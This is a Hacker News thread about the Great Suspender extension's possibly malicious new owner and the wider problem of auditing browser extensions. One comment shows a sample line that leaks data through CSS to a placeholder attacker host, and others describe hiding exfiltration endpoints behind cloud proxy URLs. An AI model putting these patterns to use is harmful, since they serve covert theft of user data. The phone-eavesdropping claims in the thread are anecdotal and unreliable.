Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
The Great Suspender: New maintainer is probably malicious (github.com/greatsuspender)
389 points by AdamGibbins on Jan 3, 2021 | hide | past | favorite | 178 comments


I am one of the few people that inspects the source-code of extensions. It's easy to do, for Firefox for example, just right-click and save-as in the extensions site, then rename your extension to a .zip file and extract e.g:

    addon.xpi --> addon.zip
Then manually sift through the code looking for obvious malicious intent (or not so obvious malicious intent if the author is doing obfuscation). Note: obfuscation is a red flag! A simple scan for `https://` / 'http://' would usually yield interesting URLs where data is sent. I have actually spotted malicious addons in the wild this way and reported them to Mozilla. They were thankfully removed.

Note: Obfuscation is NOT the same as minification, and I don't mean minification when using the word obfuscation!


Maybe Mozilla could list on the Addon's page a list of domains/IP addresses where data is being sent. A Bit like a table of Nutritional Facts for food, but for extensions.


Wouldn’t that be impossible to do as you’d have to somehow execute every code path in the plugin? The domains don’t have to exist as strings - there are lots of ways to obfuscate network requests.


Depending on how you approach it you either end up having to solve the halting problem (spoiler: it's impossible), or restricting what domains an addon can connect to (also impossible given the way addons work. they can inject arbitrary scripts into pages to make requests for them).


It's possible to make extensions declare which hostnames or registrable domains they need to communicate with. (Apart from pages in which they can run which is already defined with WebExtensions.)


But you have all the code and you know which functions/methods/etc that can do requests so it should be trivial... either way, if it is not a solvable problem, there is a major problem in the design.


>But you have all the code and you know which functions/methods/etc that can do requests so it should be trivial

but you can't. See the last part of my comment: "they can inject arbitrary scripts into pages to make requests for them".

>either way, if it is not a solvable problem, there is a major problem in the design.

Not really. It's like complaining that debuggers can impersonate programs they attach themselves to.


> they can inject arbitrary scripts into pages to make requests for them

disallow that behavior?

You could also just pull that code but it might change based on request origin...


Lots of the best extensions are basically "change this webpage when it loads to make it work better." You can't "disallow this behavior" without crippling them.


It could do all the processing locally, easily... what are you talking about?


>It could do all the processing locally, easily...

That's irrelevant. If you can make changes to the page, you can exfiltrate data. The security model for addons isn't designed with restricting an addon's network activity in mind, see my other post: https://news.ycombinator.com/item?id=25623281


Depends on what your addons does. Most addons modify the page in some way. It's also not limited to injecting javascript. You can also exfiltrate data by injecting css (eg. doing something like background-image: url("http://evil.example/?payload=...")) or do javascript injection in alternate ways (eg. adding a <script> element, or adding an onclick attribute).


That's one of the most fundamental functions a browser extension could have


I think you’re right if you’re trying to enumerate where a plug-in will call. However it’s also possible to require that a plug-in provide a list of domains it will call as part of its manifest, display that list to the user and use it as a white list for network access by the plug-in.

This ends up effect as magically determining where it’ll call, with a lot less work.


Except the add on can inject js into webpages that you have open and let the page make connections outside the extension sandbox.


Also it’s pretty easy to just proxy requests through a whitelisted server side site so https://good.com is all that shows but it requests good.com?dest=https://evil.com


Calling a website good.com doesn't make it good. A site with open redirects is a bad site.


Is that why Mozilla is blocking all addons on mobile (except for the selected 11)? They need to fix that shit or start adding useful features to Firefox... Not sure why they arent blocking all extensions on desktop too if they are so bad though.


They're already bleeding market share badly to the Chromium family, and doing that would be quite a thick nail to their popularity coffin...


Ah, that’s clearly a big issue. Never mind.


If you enumerate the ways browsers can make network requests, and if you have access to the source code of the extension, you could prepend the code with a bit of JavaScript that replaces the various network-related functions and methods with code that logs and/or validates the URL before making a request.


The attacker will then inspect itself to see if network loggers are being used, or if it's running in a test environment (network location, machine fingerprint, et.al.) then adapt its behavior accordingly to avoid setting off any warnings.


No, I’m saying modify the source of the extension so that the extension can only make requests to a whitelist of urls. The extension might be able to disable malicious functionality or something, but you can be certain that it’s not making malicious requests.


On my android tablet they checked if my keyboard was us/eu (rain down the malware) or russian/chinese (Keep the app as-is)

And this was Google Play verified with a million downloads.


So bad guys will route all traffic through a proxy instead? eg.

    this addon connects to:
    * https://484044b296.execute-api.us-east-1.amazonaws.com


I always considered proxies, url shorteners, etc to be suspicious in the first place. Some more investigation would be required in some cases.


>I always considered proxies, url shorteners, etc to be suspicious in the first place

It doesn't have to be as overt making it look like a proxy (eg. a endpoint that makes arbitrary http requests on behalf of the caller). It can be as simple as changing the endpoint for the spying service from https://evil.example.com/api/ to https://484044b296.execute-api.us-east-1.amazonaws.com/evil/...

> Some more investigation would be required in some cases.

The point is that the "nutrition facts label" doesn't really do anything because it's trivial to bypass. If it becomes widespread I guarantee every malicious addon maker would adopt this tactic.


Of course it would not be the only element in the table. But either way, it would at least tell you that an extension is leaking data when it isn't supposed to leak data (for extensions that should not require an Internet connection).


I personally would find such an inscrutable name suspicious.


Why? Would connecting to "api.example.com" be less suspicious? The same issue would still be present (namely, smuggling requests to "shady" domains using a mundane domain), and the only difference would be that it demonstrates the author paid $10/yr for the domain.


I should be able to clearly determine the intention of any domain that an extension is going to call. Anything that tries to obsfucate the actual underlying purpose is a red flag.

One might not like Google analytics, but at least you know exactly what you’re going to get when someone calls analytics.google.com.


Perhaps even a need gap for 'little snitch for browser extensions' as a browser extension(Considering OS LS or similar usually gets whitelisted for 80/433 with browsers).

Is it even possible or would the sandbox prevent such an extension from functioning?


Yes, there is probably many extensions that make outside connections that don't add benefit to the user by doing so.

I wish I could block per-app connections on Linux like Little Snitch appear to allow on Mac.


Isn't Little Snitch essentially an interactive firewall? Rather than silently denying/allowing traffic, it needs the user's decision until a connection is white/black listed? Why would this not be allowed on Linux? (other than the app doesn't exist, yet)


https://github.com/evilsocket/opensnitch

However, if you allow everything to 80/443, the extensions would still be able to connect to their servers. Maybe the browsers should add the ability to allow/deny connections per extension.

https://github.com/gustavo-iniguez-goya/opensnitch/issues/21


Every once in a while something comes up trying to be 'Little Snitch for Linux' but none has survived AFAIK, To be honest one of the reasons I use macOS is for LS and I've heard few others say that too. But now since macOS is bypassing LS or limiting its function or to put it simply doing weird network stuff I'm planning to get back to Linux.


This is entirely possible. Either by isolating the application into a network namespace (e.g. via firejail or systemd units), with selinux labels, running the process under a custom gid and various other mechanisms.


Anything is possible, but is it relatively easy to block all apps and keep a whitelist of allowed apps?


I have not done that on a desktop but seen it on servers with selinux, each service we added had to be labeled properly to get network access, one extra line in the deployment script. I'm not aware of an GUI tools though, if that's what you're asking. I think that's also the approach android uses to enforce app permissions, they obviously have a gui but that doesn't integrate with normal desktop environments.


a single line in a deployment script is as simple as it can get, thanks, I will need to give this a try


Extensions used to be able to even network requests triggered by browser internals and by other extensions. I think with webextensions this is no longer possible.


Correction: I meant 80/443 usually gets allowed for entire browser on Little Snitch, so browser extensions dialing something gets through that.


> A Bit like a table of Nutritional Facts for food, but for extensions.

Great idea!


You don't even need to do all that, just use https://robwu.nl/crxviewer/

and insert the URL of the extension, for example https://addons.mozilla.org/en-US/firefox/addon/decentraleyes... .


This may be fine, but do note that you're inserting an extra layer that you have to trust compared to inspecting the source that you know is on your local disk.

Should they choose to, nothing stops the site you've linked from masking malicious tidbits in code you request.


How do you distinguish minification from obfuscation? I mean, minified JS is essentially illegible to me.


Minifying usually doesn't touch string literals. If you have a function like connectToSite, and tell it to connect to "https://mysite.com/", then minification will rename connectToSite to just the letter "a", but the site URL stays the same and will be easy to search for in the code. If you want to connect to www.evil.com and make it not clear, you'd have to do stuff that results in longer code, like split it up into individual characters, add number values to them to get different characters, and string cat a bunch of them together to get the final URL string.


To me, minifaction will rename reallyClearFunctionName("string param") to a("string param"). While obfuscation would also encrypt the "string param" and then decrypt it at runtime. Minification's main purpose is to reduce the size, obfuscation will go one step futher and make it difficult to understand what is going on. Side note, it can be obfuscated but "maxified" (if that is a thing).

Side note: the joke goes that Perl is a write only language as it is difficult to read it and understand it. Some twisted souls decided to create the obfuscated perl content: https://en.wikipedia.org/wiki/Obfuscated_Perl_Contest

For a list of some of the winners: https://www.foo.be/docs/tpj/issues/vol4_3/tpj0403-0017.html


Advanced minification might do more optimizations than just shortening names though. In the extreme case you might have a sort of optimizing compiler that performs the equivalent of `-Os` which can make code quite unreadable.

But yes, even that shouldn't be encrypting strings.


Sure. You could also imagine a better minifier compressing string constants to save even more size.


from what i undersand, minification just involves removing line breaks and tabs and can be un-minified fairly easily with tools such as https://beautifier.io/. obfuscation involves techniques such as changing function/variable names from human-readable to human-unreadable, changing certain strings to concated variations of themselves, base64 encoded, or other similar transformations.

e.g. original code:

function NewObject()

{

var mainApiUrl="https://google.com";

}

minified code:

function NewObject(){var mainApiUrl="https://google.com";}

obfuscated code:

var _0x8275=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D"];function ahyt56(){var _0xb40bx2=_0x8275[0]}


Minifiers also reduce variable and function names to a minimal size, one character wherever possible. They do other things too... such as remove semicolons that are not needed (not in general possible, especially if you've gotten rid of line breaks, but can be done in the last statement of a block or function, for example.) The idea is to optimize for bits sent over the wire.

function a(){var b="https://google.com"}

That's why it's difficult to read minified code even if it's not obfuscated to the further extent that you sometimes see in attack payloads.


They usually also reduce variable and function names to single letters, or as short a unique sequence as possible. E.g.,

  function a(){var b="https://google.com";}


You can run it through a beautifier and get it readable again.


I don't think that's true. I don't think any tool can automatically recreate meaningful symbol names once they have been destroyed (absent things like debuginfo, which is irrelevant in the javascript context).


Unfortunately if you modify the extension at all the Mozilla will not allow you to use it in Firefox branded browsers. So while it is nice you can look, you cannot change if you use Firefox. This has been the case since Firefox 37. I assume Chrome jumped the shark even earlier.


If you are not going to list it on the store page. Mozilla has a process thst allow you to sign add-on automatically unlisted without review(you do still need a free account).


It just highlights that the whole process is awkward security theater. The only security is Moz being able to revoke access.


That is basically the whole purpose of that. A kill switch used when everything is on fire. Allows them to deactivate wide spread malwares when they discovered it. Although I have no idea whether it works or it is ever being used.

On the other side. The chrome store starts to behave badly and ban extensions they don't like for random reason after they implement that.

About mozilla, i don't know. will they eventually be like that, or they won't?


Or just use the developer edition and enable unsigned extensions.


Developer edition is a beta (or alpha since it derived from aurora line which came from alpha). You can say it doesn't have bugs but it has more than release editions. In my experience many more. Using a beta as a daily driver is not something to recommend.

Now, some distros like Debian have enough political power to get Mozilla to allow them to put Firefox branding on their altered user-freedoms-respecting repo editions of FF release. But most don't. So the only way to use actual release FF is to go outside your repos and use the unbranded version. Possible, of course, but tedious.


Even the nightly is actually quite stable in my opinion. I already used Firefox Nightly daily for years. And don't encounter major usability problems(startup crash, page not rendering type problems). Although it do sometimes have minor problems.


You can enable developer mode on release Chrome (or Edge Chromium, which is what I recommend) and use any extension you wish directly by loading the unpacked source directory.


That results in a big giant warning you have to dismiss every time when you start the chrome. Although that isn't avaiable on release channel branded firefox anyway.


> Note: obfuscation is a red flag

And why is this? Unless the extension source is already public, I don't see any reason why anyone would not use obfuscation


I've found extensions doing malicious things that were not obfuscated, by inspecting the code. Obfuscated code is just not worth installing at all. Too much work, for little benefit, to review it, when alternatives exist.


> And why is this?

I'm not saying all obfuscation is necessarily bad, just something to look out for if you're trying to sleuth around for malicious intent by the addon's author.

Typically if you want to hide the fact you are collecting the browsing secrets of the addon's user, you would use some form of obfuscation (in order to have the addon in good standing by Mozilla and to stop a simple sweep by people like myself who first look for things like http:/https: in the source).

Note: Obfuscation is NOT the same as minification, and I don't mean minification when using the word obfuscation!


There is no reason /to/ use obfuscation in good faith if the code is open source.


Then it’s a sign that they haven’t open sourced their extension, which is a red flag. Minification may be acceptable though pointless.


Minification isn’t necessarily pointless, depending on the tooling used. While the JS doesn’t have a wire cost, it does have a parsing and execution cost. Optimizing compilers like (say) Google Closure Compiler can significantly improve runtime cost, which is definitely a benefit for extension users.

That said, any extension using those tools without source code available and build verification should definitely be viewed with suspicion.


Note: Obfuscation is NOT the same as minification, and I don't mean minification when using the word obfuscation!


I've been telling everyone who will listen[1][2][3] that as an extension developer, I'd love to be able to guarantee through the Chrome App Store that an extension matches a git commit (or auditable build pipeline artifact) exactly.

It wouldn't fix everything (for example, you could still put a payload in an innocent-looking dependency), but it would at least fix the blatant problem that a maintainer can add code when uploading an extension even if the extension itself is open source and therefore (appears to be) auditable.

[1] https://news.ycombinator.com/item?id=23265699 [2] https://news.ycombinator.com/item?id=16881343 [3] https://news.ycombinator.com/item?id=16317686


What's the difference between auditing an extension's code on github vs auditing the code from the Chrome store? It seems like anyone who is willing to do an audit can just as easily download the code directly. Sites like Duo's crxcavator [1] also do exactly that.

[1]: https://crxcavator.io/


(1) Practical. Many people look at git repos. No one audits with crxcavator.

(2) Traceability. git has secure hashes, and things can't change when you're not looking.

My experience is that Google cares deeply about its own security, but not much about the security of its users. This sort of change is reasonable, but completely outside of Google's psyche. Google will

(1) Silently disable Android updates, leaving many running exploitable phones

(2) Hold back security tools for Google Apps without a premium subscription. If your account was compromised, you have no way to do audits to understand what happened without $$$, which leads to many more attackers.

(3) Expires Chromebooks rather quickly. Fortunately, unlike Android, it lets users know, but given the target market, many can't afford to upgrade.

(4) Runs appstores full of malware. When malware is discovered, users have no way to know what it did. They're just notified malware existed.

(5) Doesn't allow any sort of reasonable sandboxing of Android apps. If an app asks for filesystem, maps, and other permissions, you need to agree to run the app. I can't have Android give a dummy location or otherwise

Given that the bulk of Google's business model is built on mass surveillance for advertising, with users-as-statistics, this isn't too surprising, but it's something to be aware of if you use Google.

I firmly believe in civil liability for software companies which ship insecure products. They shouldn't be able to externalize costs like this. Follow good security practices, or your insurance premiums go up.


I'm only going to address 1) and 2) since the rest doesn't seem related to Chrome extensions.

1) Again, anyone who is willing to audit extension code can easily download it.

2) Extensions are auto-updating, so under the proposed solution the git hash would simply update with the new (say, backdoored) code. The fact that the extension is tied to a git commit hash has done nothing to protect you.


If an extension is open source, there are usually already some eyes on the GitHub codebase. If an extension version is pinned to a git hash, all those eyes could potentially spot that something is amiss.


We need to talk about how difficult it is to monetize browser extensions. Most of these problems occur when a reputable extension gets sold to a less reputable owner, frequently for a relatively small amount of money (4-5 figures). Even very popular extensions have a hard time monetizing. Unfortunately, Chrome has recently made the situation worse by deprecating Chrome Web Store payments, and Firefox eliminated their paid extension store several years ago.

If the only way to monetize an extension is to exploit its users for data, this kind of thing is going to keep happening. It's perfectly understandable how someone who is doing a lot of work for no pay will eventually get tired of it or have other priorities in life, which is what happened in this case. Perhaps we all need to stop taking it for granted that browser extensions ought to be free? Or maybe the browser vendors themselves can find ways of financially supporting extension authors. I feel that money is essential to both the problem and the solution.

Of course, paid upfront software gets sold to new owners too. But if the software is paid upfront, the expectation is that the new owner will perhaps do a better job of maintaining and marketing the software, and that's why the new owner buys it. When the software is paid, the new owner has an opportunity to make money legitimately, without secretly exploiting the existing user base.


I think we need to also talk more about our legal system's inability/unwillingness to deal with malware-like behavior that should definitely fall afoul of the CFAA. Being in an industry where monetization is difficult shouldn't be a free pass to behave maliciously like that.

The problem here isn't exploiting user's data; that is not necessarily bad as long as the user is kept informed and accepts. The problem is that the current maintainers are essentially handing over code execution privileges on millions of machines to an untrustworthy actor and that actor intentionally exploits this to run spyware-like code on those machines without their user's knowledge nor consent.


The same could be said of Web Payments in general btw. The prime mover behind the rise of adtech was lack of any standards or easy usage for payment acceptance on the Internet.

When you can't accept money for your work, selling data instead seems to be the only business model for the Internet (sadly)


> The prime mover behind the rise of adtech was lack of any standards or easy usage for payment acceptance on the Internet.

I disagree. Online commerce has always been very healthy and pervasive almost since the beginning of the web. Payments were never the problem they're sometimes made out to be. "Standards" are completely unnecessary except for the de facto standards of MasterCard and Visa that predated the web.

The rise of adtech is explained simply: many if not most consumers make decisions based on the price of the product, and nothing beats a price of free! If you can offer a product that's free and still make a profit from it by selling ads, then you have a huge advantage over non-free competitors. For physical products, that's nearly impossible, but for virtual products it's quite feasible.

Paid upfront software has a long history on the web, despite the Orwellian revisionism of the App Store apologists who want to erase the past. Even paid upfront software plugins sold on the web have a long history. Web browser plugins and extensions, on the other hand, have tended to be free. This may be the result of most web browsers being free, or included with the operating system. Firefox is free, Chrome is included with Android and free otherwise, Safari is included with macOS/iOS, Internet Explorer was and now Microsoft Edge is included with Windows. The browsers themselves never made a point of taking payments, and so browser extensions were never really designed by the browser vendors with taking payments as a priority. It's kind of an historical accident, but one the browser vendors don't seem to be interested in correcting. Although now for better or worse, Safari web extensions can only be distributed via the Mac App Store.


"Online commerce has always been very healthy and pervasive almost since the beginning of the web."

Actually, in the very early days of the Web, I was personally ridiculed by advertisers I approached with the idea of advertising online. Almost every single one I approached stated quite clearly that they were certain the web was "just a passing fad" and that "normal" people wouldn't be interested in it. They all thought advertising online was a waste of time an money.

Somehow we've gone from that to pretty much the entire advertising industry having convinced the world that the Internet could not survive without online advertising, and that they somehow have a right to spy on us all to achieve their ends, and almost nobody seems to care that we've been giving away more and more of our privacy to these unsavory characters.

"'Standards' are completely unnecessary except for the de facto standards of MasterCard and Visa that predated the web."

The web (and the Internet in general) would not exist as it does today, were it not for the existence of agreed upon standards. The entire infrastructure of the Internet is built upon standards of communication which ensure that communication between devices is even possible. Without those standards, it'd all fall apart at the seams.

"many if not most consumers make decisions based on the price of the product, and nothing beats a price of free!"

Actually, during the time I speak of above, it was also extremely common for most people to think that "free" = "garbage", and that only paid products were worth a damn. If something was given away for free, it was either a trick to get you to buy something, or it was something you wouldn't want anyway, because if it was worth anything, then it wouldn't be given away for free.


> We need to talk about how difficult it is to monetize browser extensions.

Sounds like a feature to me :)


Yes, a feature that results in the user details of millions of innocent users getting harvested. Remind us your contact details again, so we can forward them to the FBI?


I would much rather live in a world where people are aware of that possible problem than a world where paid extensions were the norm.

e: If there were paid extensions there would be pirated extensions and this problem would be even more common imo :)


The culpability of Dean Oemcke in this particular incident should not be understated. Hindsight is hindsight, of course, but the fact that the new owner of the platform distribution rights of this open-source project was (and apparently remains) anonymous seems like it ought to have been a huge red flag. The fact that these rights were paid for made it obvious that monetization was pending. The lack of transparency made it obvious that the form of that monetization would not be acceptable to the contributing community.

There might be a way of contesting the rights to the project name but that would require legal activism and external funding. Basically the original project is dead insofar as the contributors are not comfortable with supporting a parasitic and probably malicious actor. I guess a fork is inevitable. Meanwhile the parasite will harvest the value of the 'brand', distribution rights, and existing codebase until it is drained by obsolescence.

A really disgusting way to treat a community by both parties. One can only hope that Mr. Oemcke desperately needed the money for some vital purpose.


Isn't this a huge vulnerability that rises to the level of "Chrome team should police this"?

I mean, just thinking potential threats (which now I'm removing the extension because of them):

-- corporate web pages potentially sniffable if installed on work computer

-- personal passwords, password manager traffic

The potentially malicious actor is able to just scoop up any domain's encrypted traffic, isn't it? Or is there any practical assurance that they're only gathering domain names, high level traffic stats, etc?


At my company, our Macs are all managed with policies and we have a strict subset of Chrome extensions allowed for install. All of which have been vetted by our security team. Most* allowed are owned by large companies. As my company is not FAANG I would imagine this is common at many companies.


> we have a strict subset of Chrome extensions allowed for install. All of which have been vetted by our security team.

How do you handle a situation like this, where an extension was previously trusted (and would therefore have passed your vetting procedure), then acquired by somebody else who is apparently malicious? Do you review every new version?


I think that’s what he was getting at when he said:

> Most allowed are owned by large companies.

He was implying that big companies are not in the business of selling their extensions. Smaller actors are more susceptible to this.


In a word, yes. When you install and the extension says “has access to all the data on all web sites you visit” – this means all of your passwords, cookies can be recorded and sent to any other domain.


Would some agent be recording and transmitting the content of webpages in full, broadly? Or just capturing user-entered information?


Yes, and definitely. Here's an example from the NanoBlock vs uBlock Origin controversy where cookies and private data were being harvested

https://github.com/NanoAdblocker/NanoCore/issues/362#issueco...

Assume that any time an app has privilege to access your data, they are going to do it either deliberately or accidentally.


I recently tried to find a health related tracking app on the Apple AppStore in order to conveniently track and manage my health but I noticed that I cannot trust any offered app anymore, regardless of paid or free.

This can come either because the proliferation of *analytics, broad openness of supposedly sandboxed systems, needless availability of fingerprinting methods and lack of proof of privacy commitment by the vendors (and any published privacy policy is not enough), or because I just became too paranoid (or both?).

Examples like these validate the suspicion that you can’t trust any app or plug-in anymore, with big vendors being in a inbetween position of “too big to lose trust”.

I wonder when we will reach the point where there is no trusted web browser anymore, no trusted computer appliance. When will it be that you cannot even say a word to a person in-person anymore because it lands in a weakly secured cloud by the microphone inside their smartwatch that runs a weather app that is run by crooks. Or is that point reached already?


I've reached a stage where my first action after installing an app is to do a packet capture and look at what the app talks to. Sadly in the majority of cases the app gets promptly uninstalled because it ends up talking to Facebook or similarly-malicious endpoints for no good reason (even paid healthcare or accounting apps do this).

Doing this enough times I can mostly predict the result by just looking at the app and who's behind it so I no longer bother with apps and stick to the built-ins whenever possible.


> my first action after installing an app is to do a packet capture and look at what the app talks to

Can’t it talk to its own servers that then talk to Facebook, in which case packet capture is of not much use?


I agree, it's not a foolproof solution, but the presence/absence of various trackers in their app and website is usually a good predictor.

Furthermore in the name of pragmatism I am not opposed to all ad targeting; some of it is indeed outside of my control. However, there's a difference between sending a name/email address combo once during signup and having the advertising SDK ping the advertiser every single time the app is interacted with (which is what the Facebook SDK does for example); the former only leaks "I use X service" once to the advertiser, the latter leaks a detailed trail of my usage patterns & IP addresses (can be used to correlate where I've been and who I'm hanging out with if their own phones are connected to the same Wi-Fi network and thus share the same IP).


> When will it be that you cannot even say a word to a person in-person anymore because it lands in a weakly secured cloud by the microphone inside their smartwatch that runs a weather app that is run by crooks.

I believe it can already be the case with Google’s (and possibly Facebook’s) apps on Android—at least in case of Google I witnessed real-life tests showing how saying something in presence of the phone causes related ads and content to be shown in feeds—but it’s scarier with less scrupulous app maintainers.

Disclaimer: I am not claiming that Android API grants all apps unauthorized access to always-on mic. The device in question was configured to enable continuous listening by the owner. I am not claiming voice recordings are stored or used in nefarious ways.


Citations please. Not because I think you're definitely fear mongering, but because real evidence would be important to see.


An owner of a Google-branded Android phone demonstrated it to me last year, it worked remarkably fast. IIRC, the example chosen was Google News.

I can’t see how this is fear mongering. Device was not acting against owner’s will: that person specifically does not tighten relevant privacy settings and enables always-on mic because they see useful content suggestions as a feature.

It is different from my outlook (and I take it yours too), but I think that point of view deserves the right to exist.

The issue is that now when I am talking to someone like that in real life, I know I may be implicitly agreeing that Google would pick up my speech as well. It’s a clash similar to one between a person (e.g., my mom) who grants messenger apps full access to their phone’s address book for convenience, and their contact (e.g., myself) who does not want their information to be shared with Facebook et al.

Addendum: a cursory search confirms this experience.

https://www.vice.com/en/article/wjbzzy/your-phone-is-listeni...

https://www.makeuseof.com/tag/your-smartphone-listening-or-c... (2019)

https://www.quora.com/Does-Google-listen-to-my-conversations... (the first answer does not mention ads, but others share similar experience to what I saw)

— Counterpoint: https://www.bbc.co.uk/news/technology-49585682 “phones that secretly listen to us are a myth” (2019). Notably, with all my respect for BBC, this article lacks a lot of context (did they turn off voice activation before testing? what were their privacy settings?), and to test devices listening they played commercials in presence of the phone rather than using voice (I have relatively high confidence that modern devices can easily distinguish between speech nearby and sound from a commercial before recording leaves the phone).

Some sources claim that as of last year Google is changing the way their apps work. Not sure if they stop listening or stop showing relevant content.

(I don’t personally own an Android phone, and even if I did I would have turned off virtual assistants & disabled always-on mic just as I do with my iPhone, so I wouldn’t be able to present first-hand proof.)


What's described in the article is hotword-activated? So not at all what GP is supposing. If you say "Hey Google, tell me about toilet paper" and get ads for toilet paper, that's a fairly understandable cause => effect, but there are persistent anecdotes about conversations manifesting in ads where no hotword activation occurs (typically about Facebook.)

Every company vehemently denies this is possible.


I find this hard to believe because I’d think constant voice recognition would either have a noticeable impact on battery life or it’d have a major impact on data usage. Also, on iOS at least, it’d have to be provided by Apple, to be a constant background thing, and then Apple would already be using it for Siri.


If always-on mic for virtual assistant activation is enabled, it does impact battery life.

Regarding iOS, I hadn’t observed ads obviously based on what I spoke about in presence of my iPhone, but then I don’t use voice-activated Siri and generally tighten up privacy settings.


I’ve never noticed this myself: I’ve always assumed that what is actually going on is that people’s phone usage is more correlated with what they’re thinking/talking about than they realize and ad companies have gotten pretty good at uncovering these latent connections (e.g. the story about Target deducing someone was pregnant from seemingly unrelated shopping patterns).


I remember that story. However, what I observed with Android’s Google (or is it called Google News?) app last year was a tight feedback loop: after talking a little about %SUBJECT% near the phone, and refreshing the feed within the next minute or two, a relevant article from past few days showed up.

(Similar to Vice’s article I linked, but faster.)

Again, the owner of the device saw that as a convenience feature and consciously did not set the phone up to prevent it, which made me feel a little old-fashioned and unnecessarily paranoid.

Also, unlike Vice’s article, in the scenario I have witnessed the recording did not necessarily have to leave the phone: the news app could have kept a large cache of recent articles and locally pick the ones matching the %SUBJECT% that we spoke about.

I am inclined to believe that Google, given their business model and scale, is unlikely to store voice data insecurely or insufficiently de-anonymized, so I’m primarily worried about third-party apps getting access to always-on microphone without visual feedback. (Hopefully it’s not very likely and app stores have tools to detect nefarious uses of relevant APIs at review stage.)


I’d like to see an actual technical write up of this: network logs, tracing of the android device activity etc. My original impression was that the reason why mobile voice assistants have trigger words is that anything more complicated isn’t feasible as an always-on feature. (Although, I do remember stories about the Facebook app using the microphone to suggest that you post a status update about the movie or tv show you’re watching, so maybe it’s more feasible than I imagine).


You won't find one because it doesn't exist.

As a person who's made a living the last few years working in the guts of Android on embedded devices, there are so many holes in this way too common myth that phones are listening all the time.

You don't even need to dive into the technical aspect of it, what on earth is the risk reward here?!

Risk: Forever break the trust people have in your devices, this isn't some grey area intrusive tracking that would just get swept under the rug...

Reward: Get noisy info about people's interests when you literally own the device that contains more information about than their own short term memory does!

It's nonsensical, and there's no way that Google could do this that wouldn't already have been caught.

I mean is the theory that all Google devices do it and somehow no OEM has realized their microphone is getting accessed? (Because even with the lowest level access on the device, modern microphones are not so unsophisticated, there's no universal way to access it in a way a manufacturer wouldn't catch onto sooner or later

Or Google did this but only on phones they own or something?

It's nonsense.


> You won't find one because it doesn't exist.

There is no proof it happens, and no proof it doesn’t happen, because it’s non-trivial to detect based on network activity. The only evidence is observing content relevant to what was being spoken about being suggested across apps.

> Risk: Forever break the trust people have in your devices, this isn't some grey area intrusive tracking that would just get swept under the rug...

Reward: get people to love your services for relevant suggestions. Believe it or not, there are people outside the extra privacy-conscious bubble who do not at all mind their devices listening.

> Or Google did this but only on phones they own or something?

I am pretty sure this depends on software. I have seen this demonstrated on a Google-branded phone with a Google app.


> Reward: get people to love your services for relevant suggestions. Believe it or not, there are people outside the extra privacy-conscious bubble who do not at all mind their devices listening.

Like I already pointed out this is nonsense.

Always on listening even with perfect parsing would INCREDIBLY noisy. There are a million and one reasons for a term to come up in speech. The simplest conversation could surface hundreds of targeting terms.

Meanwhile they literally own the device and the services most people use. They have your search, they have your email, they have social graphs. They can literally make inferences before you even think to talk about them with other people! (and we've seen this happen before with things like disease and pregnancy reveals)

We're at the point where most people's cell phones hold more personal data than they could even recall on demand.

So why on earth would they go and muddy all that easily weighted data with noisy data like everything you say, literally every other form of interaction is already giving them better more concise information about you...

-

> There is no proof it happens, and no proof it doesn’t happen, because it’s non-trivial to detect based on network activity. The only evidence is observing content relevant to what was being spoken about being suggested across apps.

I can't believe people are entertaining this kind of stuff on HN.

You make an unreasonable claim... then act like because you yourself can't prove your unreasonable claim it should be entertained? What?

That's not how that works. You have no actual proof for your unreasonable claim... then that's it. It ends there. The burden doesn't suddenly fall on others to prove the contrary!

Come back with even a modicum of proof. Literally any real proof other than anecdotes where the ad companies who literally have almost all the data in your life anyways are able to come up with topics you're interested in... and maybe someone will entertain this.

And no, talking about something and getting an ad for it after is not proof any more than having a leaf fall on your head while you stand under in a mid-autumn forest right after you whispered "gravity" is proof that the forest is listening to your words.


Go back and reread, I have started this thread with a proof I personally witnessed. Prove it doesn’t happen.


> I’d like to see an actual technical write up of this: network logs, tracing of the android device activity etc.

FWIW there’s a technical paper[0] that summarizes existing studies as of 2019, and it’s been neither definitively proven nor disproven that it happens. Turns out it’s not at all that trivial to detect.

From the paper:

> Perhaps most importantly, Pan et al. were not able to rule out the scenario of apps transforming audio recordings into less detectable text transcripts or audio fingerprints before sending the information out. This would be a very realistic attack scenario. In fact, various popular apps are known to compress recorded audio in such a way [10, 33]. While all the choices that Pan et al. made regarding their experimental setup and methodology are completely understandable and were communicated transparently, the limitations do limit the significance of their findings. All in all, their approach would only uncover highly unsophisticated eavesdropping attempts. …

> Therefore, the fact that no evidence for large-scale mobile eavesdropping has been found so far should not be interpreted as an all-clear. It could only mean that it is difficult – under current circumstances perhaps even impossible – to detect such attacks effectively.

(Apparently, noticing relevant content being obviously suggested is the only way of detecting it at this time, and of course it comes with its own caveats.)

[0] https://link.springer.com/chapter/10.1007/978-3-030-22479-0_...


Well, I'm fairly confident that there'd be a lot of online noise about the iPhone's orange dot being on all the time, the way there was about Clipboard notifications.


I wonder if there is an equivalent of the orange dot on Android.

For sure, it’s an arms race between ecosystem’s root vendor and app developers, but the possibility of vendor itself using some privileged APIs that do not provide visual feedback is also a concern.


The Target thing was for related shopping. The scandal was thar Target noticed before she told people explicitly.


To hear "Ok Google" it need to record everything and process everything. Adding "toilett paper" as a processing keyword would not be noticable on battery life.


Sure, but for the sort of thing being suggested, you’d need to go quite a bit beyond one or two extra keywords.


100 keywords then? There doesn't have to be that many.


Which one? Vice’s article and some answers on Quora imply continuous listening without engaging a virtual assistant.

In case of my friend showing me this, this happened a few months ago and I can’t remember exactly how the demonstration went. I’m inclined to believe there was no hotword activation, as I remember myself being quite startled (at that point I disbelieved that a phone can be listening and suggesting relevant content right away), and as you noted with hotword activation it would have been markedly less surprising.


From the vice article:

> For your smartphone to actually pay attention and record your conversation, there needs to be a trigger, such as when you say “hey Siri” or “okay Google.” In the absence of these triggers, any data you provide is only processed within your own phone. This might not seem a cause for alarm, but any third party applications you have on your phone—like Facebook for example—still have access to this “non-triggered” data. And whether or not they use this data is really up to them.


Every company vehemently denies this is possible.

Until they get caught. They they issue a wishy-washing non-apology and put out a press release stating "We can do better."

We've been to this rodeo before.


This is nonsense.

If listening constantly was widespread it would have a dramatic effect on power consumption - and so battery life - and be noticed.


Isn’t this pretty much how voice-activated virtual assistants work? Microphones have to be listening in order for devices to respond to “Hey Siri” and “OK Google”, and it does impact battery life.


